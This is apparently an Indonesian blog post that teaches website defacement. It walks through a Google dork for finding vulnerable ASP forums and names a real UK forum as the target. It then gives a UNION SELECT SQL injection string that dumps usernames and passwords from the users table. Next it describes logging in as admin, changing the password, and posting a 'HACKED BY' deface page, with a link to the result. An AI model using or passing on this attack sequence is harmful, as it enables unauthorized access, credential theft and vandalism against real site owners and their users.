Cuman saya mau Membagi sedikit ilmu saya kepada Fixy-Factsim..
Dan ini sudah ada lama dan saya juga baru bisanya baru2 aja..hahaha
Nah kita mulai saja yah langsung...
kita mulai dengan langkah pertama, ketik kode di bawah ini di Paman "Google"...
Code: inurl:/forums.asp?iFor=
Pilih Salah Satu Target : http://www.microlighthangar.co.uk/forum/forums.asp?iFor=21
Saya Mengambil Target Tersebut, dan setelah itu..
Hapus angka dibelakang =
Sehingga Menjadi : http://www.microlighthangar.co.uk/forum/forums.asp?iFor=
Nah Saya harap Sampai disitu Sudah paham semuanya, dan saya akan melanjutkan memasukan SQL Code Injectnya...
Code: 12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Sehingga Menjadi : http://www.microlighthangar.co.uk/forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Tulisan yg berderet di bawah nama 10 TOPICS itu adalah Username
Tulisan yg berderet di bawah nama DATED itu adalah Passwordnya
Cari username admin & passnya.
Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password
Username : admin
Password : asuraimu (sudah saya ganti passwordnya)
Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan "POST NEW TOPICS"
Isi Subject nya...
Contoh : HACKED BY BLA BLA BLA
lalu masukin script deface HTML nya ke kolom di bawah subject.
atau kode buatan kamu sendiri, kalau memakai di atas jangan lupa di edit kata2nya...
Trus klik tombol post....
Ok...HTML deface an lo udah masuk...sekarang klik judul postingan yg lo tulis di subject tadi...
Dan ini Hasil Akhirnya
siLahkan Klik Link Di bawah ini : http://www.microlighthangar.co.uk/forum/messages.asp?iMsg=193&iFor=15
Thanks..
Tidak ada komentar:
Posting Komentar